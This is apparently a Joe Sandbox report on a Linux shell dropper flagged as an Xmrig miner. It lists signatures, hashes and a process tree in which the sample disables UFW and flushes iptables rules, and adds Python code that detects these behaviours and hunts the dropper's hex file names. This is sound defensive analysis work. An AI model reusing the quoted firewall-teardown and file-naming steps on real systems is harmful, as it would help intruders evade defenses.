
Linux Analysis Report 28e9b_ldr.sh

Overview

General Information

Sample Name: 28e9b_ldr.sh
Analysis ID: 1540633
MD5: d5c0f3993bb246c7c1f643c322da444f
SHA1: c16b4ea8255035c9bbfbd97a4af4525a6a7e3eb7
SHA256: 28e9b06e5a4606c9d806092a8ad78ce2ea7aa1077a08bcf3ec1d8e3d19714f08

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus detection for dropped file
Yara detected Xmrig cryptocurrency miner
Deletes all firewall rules
Deletes security-related log files
Detected Stratum mining protocol
Disables Ubuntu's Uncomplicated Firewall (UFW)
Drops files in suspicious directories
Executes the "crontab" command typically for achieving persistence
Executes the "iptables" command to insert, remove and/or manipulate rules
Found strings indicative of a multi-platform dropper
Found strings related to Crypto-Mining
Manipulation of devices in /dev
Sample deletes itself
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample reads from .bash_history
Sample tries to persist itself using cron
Tries to detect Cloud Protection Platforms agents (likely to circumvent detection)
Tries to load the MSR kernel module used for reading and writing the CPU's model-specific registers
Tries to read the SSH 'known_hosts' file
Tries to read the SSH config file
Uses known network protocols on non-standard ports
Writes identical ELF files to multiple locations
Writes to CPU model specific registers (MSR) (e.g. miners improve performance by disabling HW prefetcher)
Deletes log files
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "apt-get" command used for package management
Executes the "chmod" command used to modify permissions
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Executes the "grep" command used to find patterns in files or piped streams
Executes the "id" command, possibly to determine if the user is root or not
Executes the "iptables" command used for managing IP filtering and manipulation
Executes the "modprobe" command used for loading kernel modules
Executes the "nohup" (no hangup) command, used to keep a background process running after its controlling terminal closes
Executes the "ps" command used to list the status of processes
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
HTTP GET or POST without a user agent
Reads CPU information from /proc indicative of miner or evasive malware
Reads CPU information from /sys indicative of miner or evasive malware
Reads system information from the proc file system
Removes protection from files
Sample contains strings that are potentially command strings
Sample listens on a socket
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Yara signature match
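
The signature list above is the sandbox's verdict. To show how the same behaviors can be recovered from the raw process tree, here is an added example written for this page (not Joe Sandbox code): it parses "Arguments:" lines in the format used by the Process Tree section below, applies four of the listed signatures as rules, and traces every hit back to its root ancestor. The embedded input is constructed: six lines are copied from the tree on this page, and the two lines for `crontab` and `modprobe msr` (PIDs 9001 and 9002, an all-zero MD5) are hypothetical stand-ins, because the report lists those signatures without showing their command lines.

```python
import re
from collections import Counter

# Constructed sample input. The first six lines are copied from the Process
# Tree on this page; the last two (PIDs 9001 and 9002, the crontab MD5 of all
# zeros) are hypothetical stand-ins for the "persist itself using cron" and
# "load the MSR kernel module" signatures, whose command lines the page does
# not show.
SAMPLE_TREE = """\
sh (PID: 2676, Parent: 2588, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh /tmp/28e9b_ldr.sh
ufw (PID: 2685, Parent: 2676, MD5: 2494de33dc6d85c4cc46c730f3a3da02) Arguments: /usr/bin/python3 /usr/sbin/ufw disable
ufw-init (PID: 2733, Parent: 2685, MD5: fd2ac93cb7335ccffed6c5fbe98c39f7) Arguments: /bin/sh /lib/ufw/ufw-init force-stop
iptables (PID: 2766, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-logging-deny
modprobe (PID: 2771, Parent: 2766, MD5: 3d0e6fb594a9ad9c854ace3e507f86c5) Arguments: /sbin/modprobe ip_tables
iptables (PID: 3254, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -P INPUT ACCEPT
crontab (PID: 9001, Parent: 2676, MD5: 00000000000000000000000000000000) Arguments: crontab -
modprobe (PID: 9002, Parent: 2676, MD5: 3d0e6fb594a9ad9c854ace3e507f86c5) Arguments: modprobe msr
"""

# One "Arguments:" line of the tree. "New Fork" lines carry no command line,
# do not match, and are therefore skipped.
LINE_RE = re.compile(
    r"^(?:•\s*)?(?P<name>\S+) \(PID: (?P<pid>\d+), Parent: (?P<ppid>\d+), "
    r"MD5: (?P<md5>[0-9a-f]{32})\) Arguments: (?P<args>.*)$"
)


def parse_tree(text):
    """Return {pid: (name, ppid, argv)} for every process that has a command line."""
    procs = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            procs[int(m["pid"])] = (m["name"], int(m["ppid"]), m["args"].split())
    return procs


def root_of(pid, procs):
    """Follow Parent pointers while the parent is in the tree; the last PID
    reached is the root ancestor (on this page, the sh running the sample)."""
    while procs[pid][1] in procs:
        pid = procs[pid][1]
    return pid


def is_ufw_disable(name, argv):
    # ufw is a Python script, so argv[0] is the interpreter; match on the tokens.
    return "disable" in argv and any(t.endswith("ufw") for t in argv)


def is_firewall_teardown(name, argv):
    # -F flushes rules, -X deletes chains, -P ... ACCEPT opens the default
    # policy. -Z (zero counters), -L and -V change nothing and are ignored.
    if name not in ("iptables", "ip6tables"):
        return False
    return bool({"-F", "-X"} & set(argv)) or ("-P" in argv and "ACCEPT" in argv)


def is_msr_load(name, argv):
    # Only the msr module counts: iptables itself loads ip_tables via modprobe.
    return name == "modprobe" and "msr" in argv


def is_cron_persistence(name, argv):
    return name == "crontab"


RULES = [
    ("Disables Ubuntu's Uncomplicated Firewall (UFW)", is_ufw_disable),
    ("Deletes all firewall rules", is_firewall_teardown),
    ("Tries to load the MSR kernel module", is_msr_load),
    ("Sample tries to persist itself using cron", is_cron_persistence),
]


def scan(text):
    """Return (signature, pid, root_pid) for every process that matches a rule."""
    procs = parse_tree(text)
    hits = []
    for pid, (name, _ppid, argv) in sorted(procs.items()):
        for signature, predicate in RULES:
            if predicate(name, argv):
                hits.append((signature, pid, root_of(pid, procs)))
    return hits


def summarize(hits):
    """Count hits per signature, the way the report's signature list does."""
    return Counter(signature for signature, _, _ in hits)


if __name__ == "__main__":
    hits = scan(SAMPLE_TREE)
    for signature, pid, root in hits:
        print(f"PID {pid:5d} (root {root}): {signature}")
    print(dict(summarize(hits)))
```

Two points the root-ancestor trace makes visible: the roughly 170 `iptables`/`ip6tables` processes in the tree are spawned by `ufw-init force-stop`, a legitimate tool doing what `ufw disable` asks of it, so the process to alert on is the single `ufw disable` under PID 2676, the shell running the sample, from which every hit descends. And `modprobe ip_tables` under `iptables` is routine module autoloading; a rule that fires on any `modprobe` would be noise, which is why the MSR rule matches only the `msr` module.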

Classification

Analysis Advice

A non-zero exit code suggests an error during execution. Look up the error code for hints.
Some HTTP requests failed (404), so the sample likely exhibited less behavior than it would with its download server reachable.

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 1540633
Start date: 06.08.2021
Start time: 17:35:00
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 7m 19s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 28e9b_ldr.sh
Cookbook file name: Linux load provided binary as argument.jbs
Analysis system description: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Analysis Mode: default
Detection: MAL
Classification: mal100.spre.troj.evad.mine.linSH@0/12@0/0
Warnings:
  • Excluded IPs from analysis (whitelisted): 91.189.92.41, 91.189.92.19, 91.189.92.20, 91.189.92.40, 91.189.92.38, 91.189.92.39
  • Excluded domains from analysis (whitelisted): api.snapcraft.io
  • Report size exceeded maximum capacity and may have missing network information.
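
The first four forks under the sample's shell in the Process Tree below (`date`, `md5sum`, then `awk -v n=1628271357 "{print substr($1,1,n%7+6)}"` with a nested `date +%s`) are consistent with the pipeline `date | md5sum | awk -v n=$(date +%s) '{print substr($1,1,n%7+6)}'`, a common way for a dropper to derive a throwaway file name. That reconstruction is an inference from the tree, not something the page states, and the Python below is an added example written for this page, not code from the sample. It reproduces the computation so that the shape of the resulting names (6 to 12 lowercase hex characters, with the length keyed to the epoch second) can be used for hunting instead of a fixed file name.

```python
import hashlib
import re


def dropper_name(date_output: str, epoch: int) -> str:
    """Reproduce `date | md5sum | awk -v n=<epoch> '{print substr($1,1,n%7+6)}'`.

    md5sum hashes date's output including its trailing newline, and awk's
    substr() is 1-based, so the result is the first n%7+6 hex characters of
    the digest, i.e. between 6 and 12 of them.
    """
    digest = hashlib.md5((date_output + "\n").encode()).hexdigest()
    return digest[: epoch % 7 + 6]


# Every name the pipeline can produce matches this pattern.
NAME_RE = re.compile(r"[0-9a-f]{6,12}")


def is_candidate_name(name: str) -> bool:
    """True for file names that could have come from the pipeline above."""
    return NAME_RE.fullmatch(name) is not None


if __name__ == "__main__":
    # The epoch value awk received in this run; 1628271357 % 7 == 6, so the
    # name used in the sandbox run was 12 characters long. The date string is
    # a constructed placeholder: the real `date` output is not on the page.
    print(dropper_name("Fri Aug  6 17:35:57 UTC 2021", 1628271357))
```

The practical consequence is that the dropped copies (the report notes identical ELF files written to multiple locations) cannot be found by name; hunt for short all-hex names in the directories the report flags and confirm by hash instead.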

Process Tree

  • system is lnxubuntu1
  • sh (PID: 2676, Parent: 2588, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh /tmp/28e9b_ldr.sh
    • sh New Fork (PID: 2677, Parent: 2676)
      • sh New Fork (PID: 2678, Parent: 2677)
      • date (PID: 2678, Parent: 2677, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
      • sh New Fork (PID: 2679, Parent: 2677)
      • md5sum (PID: 2679, Parent: 2677, MD5: 8be81254283917cbc626597bb7fb529b) Arguments: md5sum
      • sh New Fork (PID: 2680, Parent: 2677)
        • sh New Fork (PID: 2681, Parent: 2680)
        • date (PID: 2681, Parent: 2680, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date +%s
      • awk (PID: 2680, Parent: 2677, MD5: 1bb5d753c2edd5bae269563a5ec6d0fe) Arguments: awk -v n=1628271357 "{print substr($1,1,n%7+6)}"
    • sh New Fork (PID: 2685, Parent: 2676)
    • ufw (PID: 2685, Parent: 2676, MD5: 2494de33dc6d85c4cc46c730f3a3da02) Arguments: /usr/bin/python3 /usr/sbin/ufw disable
      • ufw New Fork (PID: 2731, Parent: 2685)
      • iptables (PID: 2731, Parent: 2685, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: /sbin/iptables -V
      • ufw New Fork (PID: 2733, Parent: 2685)
      • ufw-init (PID: 2733, Parent: 2685, MD5: fd2ac93cb7335ccffed6c5fbe98c39f7) Arguments: /bin/sh /lib/ufw/ufw-init force-stop
        • ufw-init New Fork (PID: 2738, Parent: 2733)
        • ip6tables (PID: 2738, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -L INPUT -n
          • modprobe (PID: 2740, Parent: 2738, MD5: 3d0e6fb594a9ad9c854ace3e507f86c5) Arguments: /sbin/modprobe ip6_tables
        • ufw-init New Fork (PID: 2766, Parent: 2733)
        • iptables (PID: 2766, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-logging-deny
          • iptables New Fork (PID: 2771, Parent: 2766)
          • modprobe (PID: 2771, Parent: 2766, MD5: 3d0e6fb594a9ad9c854ace3e507f86c5) Arguments: /sbin/modprobe ip_tables
        • ufw-init New Fork (PID: 2792, Parent: 2733)
        • iptables (PID: 2792, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-logging-allow
        • ufw-init New Fork (PID: 2793, Parent: 2733)
        • iptables (PID: 2793, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-not-local
        • ufw-init New Fork (PID: 2797, Parent: 2733)
        • iptables (PID: 2797, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-user-logging-input
        • ufw-init New Fork (PID: 2802, Parent: 2733)
        • iptables (PID: 2802, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-user-limit-accept
        • ufw-init New Fork (PID: 2807, Parent: 2733)
        • iptables (PID: 2807, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-user-limit
        • ufw-init New Fork (PID: 2810, Parent: 2733)
        • iptables (PID: 2810, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-skip-to-policy-input
        • ufw-init New Fork (PID: 2815, Parent: 2733)
        • iptables (PID: 2815, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-reject-input
        • ufw-init New Fork (PID: 2819, Parent: 2733)
        • iptables (PID: 2819, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-after-logging-input
        • ufw-init New Fork (PID: 2823, Parent: 2733)
        • iptables (PID: 2823, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-after-input
        • ufw-init New Fork (PID: 2830, Parent: 2733)
        • iptables (PID: 2830, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-user-input
        • ufw-init New Fork (PID: 2835, Parent: 2733)
        • iptables (PID: 2835, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-before-input
        • ufw-init New Fork (PID: 2841, Parent: 2733)
        • iptables (PID: 2841, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-before-logging-input
        • ufw-init New Fork (PID: 2849, Parent: 2733)
        • iptables (PID: 2849, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-skip-to-policy-forward
        • ufw-init New Fork (PID: 2858, Parent: 2733)
        • iptables (PID: 2858, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-reject-forward
        • ufw-init New Fork (PID: 2863, Parent: 2733)
        • iptables (PID: 2863, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-after-logging-forward
        • ufw-init New Fork (PID: 2869, Parent: 2733)
        • iptables (PID: 2869, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-after-forward
        • ufw-init New Fork (PID: 2874, Parent: 2733)
        • iptables (PID: 2874, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-user-logging-forward
        • ufw-init New Fork (PID: 2881, Parent: 2733)
        • iptables (PID: 2881, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-user-forward
        • ufw-init New Fork (PID: 2887, Parent: 2733)
        • iptables (PID: 2887, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-before-forward
        • ufw-init New Fork (PID: 2897, Parent: 2733)
        • iptables (PID: 2897, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-before-logging-forward
        • ufw-init New Fork (PID: 2902, Parent: 2733)
        • iptables (PID: 2902, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-track-forward
        • ufw-init New Fork (PID: 2910, Parent: 2733)
        • iptables (PID: 2910, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-track-output
        • ufw-init New Fork (PID: 2913, Parent: 2733)
        • iptables (PID: 2913, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-track-input
        • ufw-init New Fork (PID: 2921, Parent: 2733)
        • iptables (PID: 2921, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-skip-to-policy-output
        • ufw-init New Fork (PID: 2929, Parent: 2733)
        • iptables (PID: 2929, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-reject-output
        • ufw-init New Fork (PID: 2935, Parent: 2733)
        • iptables (PID: 2935, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-after-logging-output
        • ufw-init New Fork (PID: 2944, Parent: 2733)
        • iptables (PID: 2944, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-after-output
        • ufw-init New Fork (PID: 2951, Parent: 2733)
        • iptables (PID: 2951, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-user-logging-output
        • ufw-init New Fork (PID: 2957, Parent: 2733)
        • iptables (PID: 2957, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-user-output
        • ufw-init New Fork (PID: 2963, Parent: 2733)
        • iptables (PID: 2963, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-before-output
        • ufw-init New Fork (PID: 2968, Parent: 2733)
        • iptables (PID: 2968, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -F ufw-before-logging-output
        • ufw-init New Fork (PID: 2974, Parent: 2733)
        • iptables (PID: 2974, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-logging-deny
        • ufw-init New Fork (PID: 2980, Parent: 2733)
        • iptables (PID: 2980, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-logging-allow
        • ufw-init New Fork (PID: 2986, Parent: 2733)
        • iptables (PID: 2986, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-not-local
        • ufw-init New Fork (PID: 2993, Parent: 2733)
        • iptables (PID: 2993, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-user-logging-input
        • ufw-init New Fork (PID: 3000, Parent: 2733)
        • iptables (PID: 3000, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-user-limit-accept
        • ufw-init New Fork (PID: 3009, Parent: 2733)
        • iptables (PID: 3009, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-user-limit
        • ufw-init New Fork (PID: 3018, Parent: 2733)
        • iptables (PID: 3018, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-skip-to-policy-input
        • ufw-init New Fork (PID: 3024, Parent: 2733)
        • iptables (PID: 3024, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-reject-input
        • ufw-init New Fork (PID: 3030, Parent: 2733)
        • iptables (PID: 3030, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-after-logging-input
        • ufw-init New Fork (PID: 3037, Parent: 2733)
        • iptables (PID: 3037, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-after-input
        • ufw-init New Fork (PID: 3045, Parent: 2733)
        • iptables (PID: 3045, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-user-input
        • ufw-init New Fork (PID: 3050, Parent: 2733)
        • iptables (PID: 3050, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-before-input
        • ufw-init New Fork (PID: 3056, Parent: 2733)
        • iptables (PID: 3056, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-before-logging-input
        • ufw-init New Fork (PID: 3062, Parent: 2733)
        • iptables (PID: 3062, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-skip-to-policy-forward
        • ufw-init New Fork (PID: 3066, Parent: 2733)
        • iptables (PID: 3066, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-reject-forward
        • ufw-init New Fork (PID: 3071, Parent: 2733)
        • iptables (PID: 3071, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-after-logging-forward
        • ufw-init New Fork (PID: 3077, Parent: 2733)
        • iptables (PID: 3077, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-after-forward
        • ufw-init New Fork (PID: 3086, Parent: 2733)
        • iptables (PID: 3086, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-user-logging-forward
        • ufw-init New Fork (PID: 3092, Parent: 2733)
        • iptables (PID: 3092, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-user-forward
        • ufw-init New Fork (PID: 3098, Parent: 2733)
        • iptables (PID: 3098, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-before-forward
        • ufw-init New Fork (PID: 3104, Parent: 2733)
        • iptables (PID: 3104, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-before-logging-forward
        • ufw-init New Fork (PID: 3110, Parent: 2733)
        • iptables (PID: 3110, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-track-forward
        • ufw-init New Fork (PID: 3116, Parent: 2733)
        • iptables (PID: 3116, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-track-output
        • ufw-init New Fork (PID: 3123, Parent: 2733)
        • iptables (PID: 3123, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-track-input
        • ufw-init New Fork (PID: 3126, Parent: 2733)
        • iptables (PID: 3126, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-skip-to-policy-output
        • ufw-init New Fork (PID: 3130, Parent: 2733)
        • iptables (PID: 3130, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-reject-output
        • ufw-init New Fork (PID: 3135, Parent: 2733)
        • iptables (PID: 3135, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-after-logging-output
        • ufw-init New Fork (PID: 3142, Parent: 2733)
        • iptables (PID: 3142, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-after-output
        • ufw-init New Fork (PID: 3147, Parent: 2733)
        • iptables (PID: 3147, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-user-logging-output
        • ufw-init New Fork (PID: 3153, Parent: 2733)
        • iptables (PID: 3153, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-user-output
        • ufw-init New Fork (PID: 3158, Parent: 2733)
        • iptables (PID: 3158, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-before-output
        • ufw-init New Fork (PID: 3166, Parent: 2733)
        • iptables (PID: 3166, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -Z ufw-before-logging-output
        • ufw-init New Fork (PID: 3171, Parent: 2733)
        • iptables (PID: 3171, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -X ufw-logging-deny
        • ufw-init New Fork (PID: 3176, Parent: 2733)
        • iptables (PID: 3176, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -X ufw-logging-allow
        • ufw-init New Fork (PID: 3182, Parent: 2733)
        • iptables (PID: 3182, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -X ufw-not-local
        • ufw-init New Fork (PID: 3188, Parent: 2733)
        • iptables (PID: 3188, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -X ufw-user-logging-input
        • ufw-init New Fork (PID: 3195, Parent: 2733)
        • iptables (PID: 3195, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -X ufw-user-logging-output
        • ufw-init New Fork (PID: 3200, Parent: 2733)
        • iptables (PID: 3200, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -X ufw-user-logging-forward
        • ufw-init New Fork (PID: 3208, Parent: 2733)
        • iptables (PID: 3208, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -X ufw-user-limit-accept
        • ufw-init New Fork (PID: 3213, Parent: 2733)
        • iptables (PID: 3213, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -X ufw-user-limit
        • ufw-init New Fork (PID: 3219, Parent: 2733)
        • iptables (PID: 3219, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -X ufw-user-input
        • ufw-init New Fork (PID: 3224, Parent: 2733)
        • iptables (PID: 3224, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -X ufw-user-forward
        • ufw-init New Fork (PID: 3230, Parent: 2733)
        • iptables (PID: 3230, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -X ufw-user-output
        • ufw-init New Fork (PID: 3236, Parent: 2733)
        • iptables (PID: 3236, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -X ufw-skip-to-policy-input
        • ufw-init New Fork (PID: 3244, Parent: 2733)
        • iptables (PID: 3244, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -X ufw-skip-to-policy-output
        • ufw-init New Fork (PID: 3249, Parent: 2733)
        • iptables (PID: 3249, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -X ufw-skip-to-policy-forward
        • ufw-init New Fork (PID: 3254, Parent: 2733)
        • iptables (PID: 3254, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -P INPUT ACCEPT
        • ufw-init New Fork (PID: 3261, Parent: 2733)
        • iptables (PID: 3261, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -P OUTPUT ACCEPT
        • ufw-init New Fork (PID: 3266, Parent: 2733)
        • iptables (PID: 3266, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -P FORWARD ACCEPT
        • ufw-init New Fork (PID: 3273, Parent: 2733)
        • ip6tables (PID: 3273, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-logging-deny
        • ufw-init New Fork (PID: 3278, Parent: 2733)
        • ip6tables (PID: 3278, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-logging-allow
        • ufw-init New Fork (PID: 3283, Parent: 2733)
        • ip6tables (PID: 3283, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-not-local
        • ufw-init New Fork (PID: 3287, Parent: 2733)
        • ip6tables (PID: 3287, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-user-logging-input
        • ufw-init New Fork (PID: 3292, Parent: 2733)
        • ip6tables (PID: 3292, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-user-limit-accept
        • ufw-init New Fork (PID: 3300, Parent: 2733)
        • ip6tables (PID: 3300, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-user-limit
        • ufw-init New Fork (PID: 3307, Parent: 2733)
        • ip6tables (PID: 3307, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-skip-to-policy-input
        • ufw-init New Fork (PID: 3314, Parent: 2733)
        • ip6tables (PID: 3314, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-reject-input
        • ufw-init New Fork (PID: 3320, Parent: 2733)
        • ip6tables (PID: 3320, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-after-logging-input
        • ufw-init New Fork (PID: 3324, Parent: 2733)
        • ip6tables (PID: 3324, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-after-input
        • ufw-init New Fork (PID: 3330, Parent: 2733)
        • ip6tables (PID: 3330, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-user-input
        • ufw-init New Fork (PID: 3335, Parent: 2733)
        • ip6tables (PID: 3335, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-before-input
        • ufw-init New Fork (PID: 3341, Parent: 2733)
        • ip6tables (PID: 3341, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-before-logging-input
        • ufw-init New Fork (PID: 3345, Parent: 2733)
        • ip6tables (PID: 3345, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-skip-to-policy-forward
        • ufw-init New Fork (PID: 3351, Parent: 2733)
        • ip6tables (PID: 3351, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-reject-forward
        • ufw-init New Fork (PID: 3356, Parent: 2733)
        • ip6tables (PID: 3356, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-after-logging-forward
        • ufw-init New Fork (PID: 3360, Parent: 2733)
        • ip6tables (PID: 3360, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-after-forward
        • ufw-init New Fork (PID: 3365, Parent: 2733)
        • ip6tables (PID: 3365, Parent: 2733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: ip6tables -F ufw6-user-logging-forward
